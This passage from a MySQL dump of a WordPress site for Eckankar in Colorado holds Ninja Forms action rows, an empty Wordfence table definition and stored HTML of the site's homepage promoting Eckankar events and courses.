/*!40000 ALTER TABLE `wpcl_nf3_actions` DISABLE KEYS */;
INSERT INTO `wpcl_nf3_actions` VALUES (1,'','','save',1,1,'2019-07-15 19:38:57','2019-07-15 13:38:57','Store Submission'),(2,'','','email',1,1,'2019-07-15 19:38:57','2019-07-15 13:38:57','Email Confirmation'),(3,'','','email',1,1,'2019-07-15 19:38:57','2019-07-15 13:38:57','Email Notification'),(4,'','','successmessage',1,1,'2019-07-15 19:38:57','2019-07-15 13:38:57','Success Message'),(5,'','','save',1,2,'2018-01-03 19:44:32',NULL,'Save Form'),(6,'','','email',1,2,'2018-01-03 19:44:32',NULL,'Send copy to user'),(7,'','','successmessage',1,2,'2018-01-03 19:44:32',NULL,'Success Message'),(8,'','','email',1,2,'2018-01-03 19:44:32',NULL,'Admin Email'),(13,'','','save',1,4,'2018-01-03 19:45:13',NULL,'Save Form'),(14,'','','email',1,4,'2018-01-03 19:45:13',NULL,'Send copy to user'),(15,'','','successmessage',1,4,'2018-01-03 19:45:13',NULL,'Success Message'),(16,'','','email',1,4,'2018-01-03 19:45:13',NULL,'Admin Email'),(17,'','','save',1,5,'2018-01-03 19:43:24',NULL,'Save Form'),(18,'','','email',1,5,'2018-01-03 19:43:24',NULL,'Send copy to user'),(19,'','','successmessage',1,5,'2018-01-03 19:43:24',NULL,'Success Message'),(20,'','','email',1,5,'2018-01-03 19:43:24',NULL,'Admin Email'),(21,'','','save',1,6,'2018-01-03 19:43:34',NULL,'Save Form'),(22,'','','email',1,6,'2018-01-03 19:43:34',NULL,'Send copy to user'),(23,'','','successmessage',1,6,'2018-01-03 19:43:34',NULL,'Success Message'),(24,'','','email',1,6,'2018-01-03 19:43:34',NULL,'Admin Email'),(29,'','','save',1,8,'2018-01-03 19:42:46',NULL,'Save Form'),(30,'','','email',1,8,'2018-01-03 19:42:46',NULL,'Send copy to user'),(31,'','','successmessage',1,8,'2018-01-03 19:42:46',NULL,'Success Message'),(32,'','','email',1,8,'2018-01-03 19:42:46',NULL,'Admin Email'),(33,'','','save',1,9,'2018-01-03 19:45:34',NULL,'Save Form'),(34,'','','email',1,9,'2018-01-03 19:45:34',NULL,'Send copy to user'),(35,'','','successmessage',1,9,'2018-01-03 19:45:34',NULL,'Success Message'),(36,'','','email',1,9,'2018-01-03 19:45:34',NULL,'Admin Email'),(37,'','','save',1,10,'2018-01-03 19:42:35',NULL,'Save Form'),(38,'','','email',1,10,'2018-01-03 19:42:35',NULL,'Send copy to user'),(39,'','','successmessage',1,10,'2018-01-03 19:42:35',NULL,'Success Message'),(40,'','','email',1,10,'2018-01-03 19:42:35',NULL,'Admin Email'),(41,'','','save',1,11,'2018-01-03 19:44:03',NULL,'Save Form'),(42,'','','email',1,11,'2018-01-03 19:44:03',NULL,'Send copy to user'),(43,'','','successmessage',1,11,'2018-01-03 19:44:03',NULL,'Success Message'),(44,'','','email',1,11,'2018-01-03 19:44:03',NULL,'Admin Email'),(45,'','','save',1,12,'2018-01-03 19:42:54',NULL,'Save Form'),(46,'','','email',1,12,'2018-01-03 19:42:53',NULL,'Send copy to user'),(47,'','','successmessage',1,12,'2018-01-03 19:42:53',NULL,'Success Message'),(48,'','','email',1,12,'2018-01-03 19:42:54',NULL,'Admin Email'),(49,'','','save',1,13,'2018-01-03 19:45:44',NULL,'Save Form'),(50,'','','email',0,13,'2018-01-03 19:45:44',NULL,'Send copy to user'),(51,'','','successmessage',1,13,'2018-01-03 19:45:44',NULL,'Success Message'),(52,'','','email',1,13,'2018-01-03 19:45:44',NULL,'Admin Email'),(53,'','','save',1,14,'2018-01-03 20:34:29',NULL,'Save Form'),(54,'','','email',1,14,'2018-01-03 20:34:29',NULL,'Send copy to user'),(55,'','','successmessage',1,14,'2018-01-03 20:34:29',NULL,'Success Message'),(56,'','','email',1,14,'2018-01-03 20:34:29',NULL,'Admin Email'),(57,'','','save',1,15,'2018-01-03 19:44:15',NULL,'Save Form'),(58,'','','email',1,15,'2018-01-03 19:44:14',NULL,'Send copy to user'),(59,'','','successmessage',1,15,'2018-01-03 19:44:14',NULL,'Success Message'),(60,'','','email',1,15,'2018-01-03 19:44:14',NULL,'Admin Email'),(61,'','','save',1,16,'2018-01-03 19:43:02',NULL,'Save Form'),(62,'','','email',1,16,'2018-01-03 19:43:02',NULL,'Send copy to user'),(63,'','','successmessage',1,16,'2018-01-03 19:43:02',NULL,'Success Message'),(64,'','','email',1,16,'2018-01-03 19:43:02',NULL,'Admin Email'),(65,'','','save',1,17,'2019-02-13 21:44:28',NULL,'Store Submission'),(66,'','','email',1,17,'2019-02-13 21:44:28',NULL,'Admin Email'),(67,'','','successmessage',1,17,'2019-02-13 21:44:28',NULL,'Success Message'),(68,'','','email',1,17,'2019-02-13 21:53:21',NULL,'Send copy to user'),(69,'','','save',1,18,'2018-01-03 19:43:16',NULL,'Save Form'),(70,'','','email',1,18,'2018-01-03 19:43:16',NULL,'Send copy to user'),(71,'','','successmessage',1,18,'2018-01-03 19:43:16',NULL,'Success Message'),(72,'','','email',1,18,'2018-01-03 19:43:16',NULL,'Admin Email'),(73,'','','save',1,19,'2018-01-03 19:44:41',NULL,'Save Form'),(74,'','','email',1,19,'2018-01-03 19:44:41',NULL,'Send copy to user'),(75,'','','successmessage',1,19,'2018-01-03 19:44:41',NULL,'Success Message'),(76,'','','email',1,19,'2018-01-03 19:44:41',NULL,'Admin Email'),(77,'','','save',1,20,'2018-01-03 19:44:49',NULL,'Save Form'),(78,'','','email',1,20,'2018-01-03 19:44:49',NULL,'Send copy to user'),(79,'','','successmessage',1,20,'2018-01-03 19:44:49',NULL,'Success Message'),(80,'','','email',1,20,'2018-01-03 19:44:49',NULL,'Admin Email'),(81,'','','save',1,21,'2018-01-03 19:45:53',NULL,'Save Form'),(82,'','','email',1,21,'2018-01-03 19:45:53',NULL,'Send copy to user'),(83,'','','successmessage',1,21,'2018-01-03 19:45:53',NULL,'Success Message'),(84,'','','email',1,21,'2018-01-03 19:45:53',NULL,'Admin Email'),(85,'','','save',1,22,'2018-01-03 19:44:55',NULL,'Save Form'),(86,'','','email',1,22,'2018-01-03 19:44:55',NULL,'Send copy to user'),(87,'','','successmessage',1,22,'2018-01-03 19:44:55',NULL,'Success Message'),(88,'','','email',1,22,'2018-01-03 19:44:55',NULL,'Admin Email'),(89,'','','save',1,23,'2018-01-03 19:45:04',NULL,'Save Form'),(90,'','','email',1,23,'2018-01-03 19:45:04',NULL,'Send copy to user'),(91,'','','successmessage',1,23,'2018-01-03 19:45:04',NULL,'Success Message'),(92,'','','email',1,23,'2018-01-03 19:45:04',NULL,'Admin Email'),(93,'','','save',1,24,'2018-01-03 19:45:20',NULL,'Save Form'),(94,'','','email',1,24,'2018-01-03 19:45:20',NULL,'Send copy to user'),(95,'','','successmessage',1,24,'2018-01-03 19:45:20',NULL,'Success Message'),(96,'','','email',1,24,'2018-01-03 19:45:20',NULL,'Admin Email'),(97,'','','save',1,25,'2018-01-03 19:46:01',NULL,'Save Form'),(98,'','','email',0,25,'2018-01-03 19:46:01',NULL,'Send copy to user'),(99,'','','successmessage',1,25,'2018-01-03 19:46:01',NULL,'Success Message'),(100,'','','email',1,25,'2018-01-03 19:46:01',NULL,'Admin Email'),(117,NULL,NULL,'save',1,30,'2018-01-03 19:43:08',NULL,'Save Form'),(118,NULL,NULL,'email',1,30,'2018-01-03 19:43:08',NULL,'Send copy to user'),(119,NULL,NULL,'successmessage',1,30,'2018-01-03 19:43:08',NULL,'Success Message'),(120,NULL,NULL,'email',1,30,'2018-01-03 19:43:08',NULL,'Admin Email'),(125,'','','save',1,32,'2019-08-08 03:08:36',NULL,'Save Form'),(126,'','','email',1,32,'2019-08-08 03:08:36',NULL,'Send copy to user'),(127,'','','successmessage',1,32,'2019-08-08 03:08:36',NULL,'Success Message'),(128,'','','email',1,32,'2019-08-08 03:08:36',NULL,'Admin Email'),(129,'','','save',1,33,'2016-08-24 23:39:20',NULL,'Store Submission'),(130,'','','email',1,33,'2016-08-24 23:39:20',NULL,'Email Confirmation'),(131,'','','email',1,33,'2016-08-24 23:47:39',NULL,'Email Notification'),(132,'','','successmessage',1,33,'2016-08-24 23:39:20',NULL,'Success Message'),(133,'','','save',1,34,'2019-09-21 02:37:28',NULL,'Save Form'),(134,'','','email',0,34,'2019-09-21 02:37:28',NULL,'Send copy to user'),(135,'','','successmessage',1,34,'2019-09-21 02:37:28',NULL,'Success Message'),(136,'','','email',1,34,'2019-09-21 02:37:28',NULL,'Admin Email'),(137,'','','save',1,35,'2018-01-03 19:45:44',NULL,'Save Form'),(138,'','','email',0,35,'2018-01-03 19:45:44',NULL,'Send copy to user'),(139,'','','successmessage',1,35,'2018-01-03 19:45:44',NULL,'Success Message'),(140,'','','email',1,35,'2018-01-03 19:45:44',NULL,'Admin Email'),(149,'','','save',1,38,'2020-12-08 23:42:53',NULL,'Save Form'),(150,'','','email',0,38,'2020-12-08 23:42:53',NULL,'Send copy to user'),(151,'','','successmessage',1,38,'2020-12-08 23:42:53',NULL,'Success Message'),(152,'','','email',1,38,'2020-12-08 23:42:53',NULL,'Admin Email'),(153,'','','save',1,39,'2021-01-28 18:29:47',NULL,'Save Form'),(154,'','','email',0,39,'2021-01-28 18:29:47',NULL,'Send copy to user'),(155,'','','successmessage',1,39,'2021-01-28 18:29:47',NULL,'Success Message'),(156,'','','email',1,39,'2021-01-28 18:29:47',NULL,'Admin Email'),(161,'','','save',1,41,'2021-02-21 21:50:21',NULL,'Save Form'),(162,'','','email',1,41,'2021-02-21 21:50:21',NULL,'Send copy to user'),(163,'','','successmessage',0,41,'2021-02-21 21:50:21',NULL,'Success Message'),(164,'','','email',1,41,'2021-02-21 21:50:21',NULL,'Admin Email'),(165,NULL,NULL,'redirect',1,41,'2021-02-22 17:47:38','2021-02-22 10:47:38','Success Message'),(166,'','','save',1,42,'2016-08-28 23:16:05',NULL,'Store Submission'),(167,'','','email',1,42,'2016-08-28 23:16:05',NULL,'User Email Confirmation'),(168,'','','email',1,42,'2016-08-28 23:16:05',NULL,'Admin Email Notification'),(169,'','','successmessage',1,42,'2016-08-28 23:16:05',NULL,'Success Message'),(175,'','','save',1,44,'2016-08-28 23:16:05',NULL,'Store Submission'),(176,'','','email',1,44,'2021-04-24 18:24:47',NULL,'ECK Registration Confirmation'),(177,'','','email',1,44,'2016-08-28 23:16:05',NULL,'Admin Email Notification'),(178,'','','successmessage',0,44,'2016-08-28 23:16:05',NULL,'Success Message'),(183,'','','save',1,46,'2021-05-04 17:48:03',NULL,'Store Submission'),(184,'','','email',1,46,'2021-05-04 17:48:03',NULL,'ECK Registration Confirmation'),(185,'','','email',1,46,'2021-05-04 17:48:03',NULL,'Admin Email Notification'),(186,'','','successmessage',1,46,'2021-05-04 17:48:03',NULL,'Success Message'),(187,'','','save',1,47,'2016-08-28 23:16:05',NULL,'Store Submission'),(188,'','','email',1,47,'2016-08-28 23:16:05',NULL,'User Email Confirmation'),(189,'','','email',1,47,'2016-08-28 23:16:05',NULL,'Admin Email Notification'),(190,'','','successmessage',1,47,'2016-08-28 23:16:05',NULL,'Success Message'),(191,'','','save',1,48,'2021-05-19 15:12:04',NULL,'Store Submission'),(192,'','','email',1,48,'2021-05-19 15:12:04',NULL,'ECK Book Discussion - Registration Confirmation'),(193,'','','email',1,48,'2021-05-19 15:12:04',NULL,'Admin Email Notification'),(194,'','','successmessage',1,48,'2021-05-19 15:12:04',NULL,'Success Message'),(195,'','','save',1,49,'2021-05-22 02:29:40',NULL,'Save Form'),(196,'','','email',0,49,'2021-05-22 02:29:40',NULL,'Send copy to user'),(197,'','','successmessage',1,49,'2021-05-22 02:29:40',NULL,'Success Message'),(198,'','','email',1,49,'2021-05-22 02:29:40',NULL,'Admin Email'),(199,NULL,NULL,'save',1,50,'2018-04-17 03:32:15',NULL,'Store Submission'),(200,NULL,NULL,'successmessage',1,50,'2018-04-17 03:32:15',NULL,'Success Message'),(201,NULL,NULL,'email',1,50,'2018-04-17 03:32:15',NULL,'Admin Email'),(202,'','','save',1,51,'2021-08-29 19:58:19',NULL,'Store Submission'),(203,'','','email',1,51,'2021-08-29 19:58:19',NULL,'ECK Book Discussion - Registration Confirmation'),(204,'','','email',1,51,'2021-08-29 19:58:19',NULL,'Admin Email Notification'),(205,'','','successmessage',1,51,'2021-08-29 19:58:19',NULL,'Success Message'),(210,NULL,NULL,'redirect',1,44,'2021-10-18 17:05:09','2021-10-18 11:05:09','Redirect'),(211,'','','save',1,53,'2022-02-17 16:38:19',NULL,'Save Form'),(212,'','','email',1,53,'2022-02-17 16:38:19',NULL,'Send copy to user'),(213,'','','successmessage',1,53,'2022-02-17 16:38:19',NULL,'Success Message'),(214,'','','email',1,53,'2022-02-17 16:38:19',NULL,'Admin Email'),(215,'','','save',1,54,'2022-03-02 15:44:18',NULL,'Store Submission'),(216,'','','email',1,54,'2022-03-02 15:44:18',NULL,'ECK Registration Confirmation'),(217,'','','email',1,54,'2022-03-02 15:44:18',NULL,'Admin Email Notification'),(218,'','','successmessage',1,54,'2022-03-02 15:44:18',NULL,'Success Message'),(219,'','','save',1,55,'2016-08-28 23:16:05',NULL,'Record Submission'),(220,'','','email',1,55,'2016-08-28 23:16:05',NULL,'User Email Confirmation'),(221,'','','email',1,55,'2016-08-28 23:16:05',NULL,'Admin Email Notification'),(222,'','','successmessage',1,55,'2016-08-28 23:16:05',NULL,'Success Message'),(223,'','','save',1,56,'2022-04-05 21:40:44',NULL,'Save Form'),(224,'','','email',0,56,'2022-04-05 21:40:44',NULL,'Send copy to user'),(225,'','','successmessage',1,56,'2022-04-05 21:40:44',NULL,'Success Message'),(226,'','','email',1,56,'2022-04-05 21:40:44',NULL,'Admin Email'),(240,NULL,NULL,'recaptcha',1,13,'2022-09-20 16:08:36','2022-09-20 10:08:36','reCAPTCHA v3'),(241,'','','save',1,60,'2022-09-21 06:27:15',NULL,'Save Form'),(242,'','','email',0,60,'2022-09-21 06:27:15',NULL,'Send copy to user'),(243,'','','successmessage',1,60,'2022-09-21 06:27:15',NULL,'Success Message'),(244,'','','email',1,60,'2022-09-21 06:27:15',NULL,'Admin Email'),(250,'','','email',1,61,'2023-02-01 16:31:40',NULL,'User Email Confirmation'),(251,'','','save',1,61,'2023-02-01 16:31:40',NULL,'Store Submission'),(252,'','','email',1,61,'2023-02-01 16:31:40',NULL,'Admin Email Notification'),(253,'','','successmessage',1,61,'2023-02-01 16:31:40',NULL,'Success Message'),(254,'','','save',1,62,'2023-07-04 16:22:26',NULL,'Save Form'),(255,'','','email',1,62,'2023-07-04 16:22:26',NULL,'Send copy to user'),(256,'','','successmessage',1,62,'2023-07-04 16:22:26',NULL,'Success Message'),(257,'','','email',1,62,'2023-07-04 16:22:26',NULL,'Admin Email'),(258,'','','email',1,63,'2023-09-05 15:39:18',NULL,'User Email Confirmation'),(259,'','','save',1,63,'2023-09-05 15:39:18',NULL,'Store Submission'),(260,'','','email',1,63,'2023-09-05 15:39:18',NULL,'Admin Email Notification'),(261,'','','successmessage',1,63,'2023-09-05 15:39:18',NULL,'Success Message');
/*!40000 ALTER TABLE `wpcl_nf3_actions` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_nf3_actions` with 190 row(s)
--

--
-- Table structure for table `wpcl_wfhoover`
--

DROP TABLE IF EXISTS `wpcl_wfhoover`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wfhoover` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `owner` text DEFAULT NULL,
  `host` text DEFAULT NULL,
  `path` text DEFAULT NULL,
  `hostKey` varbinary(124) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k2` (`hostKey`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wfhoover`
--

LOCK TABLES `wpcl_wfhoover` WRITE;
/*!40000 ALTER TABLE `wpcl_wfhoover` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_wfhoover` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wfhoover` with 0 row(s)
--

--
-- Table structure for table `wpcl_simple_history_contexts`
--

DROP TABLE IF EXISTS `wpcl_simple_history_contexts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_simple_history_contexts` (
  `context_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `history_id` bigint(20) unsigned NOT NULL,
  `key` varchar(255) DEFAULT NULL,
  `value` longtext DEFAULT NULL,
  PRIMARY KEY (`context_id`),
  KEY `history_id` (`history_id`),
  KEY `key` (`key`)
) ENGINE=MyISAM AUTO_INCREMENT=243442 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_simple_history_contexts`
--

LOCK TABLES `wpcl_simple_history_contexts` WRITE;
/*!40000 ALTER TABLE `wpcl_simple_history_contexts` DISABLE KEYS */;
INSERT INTO `wpcl_simple_history_contexts` VALUES (236815,40261,'post_new_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -101px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" 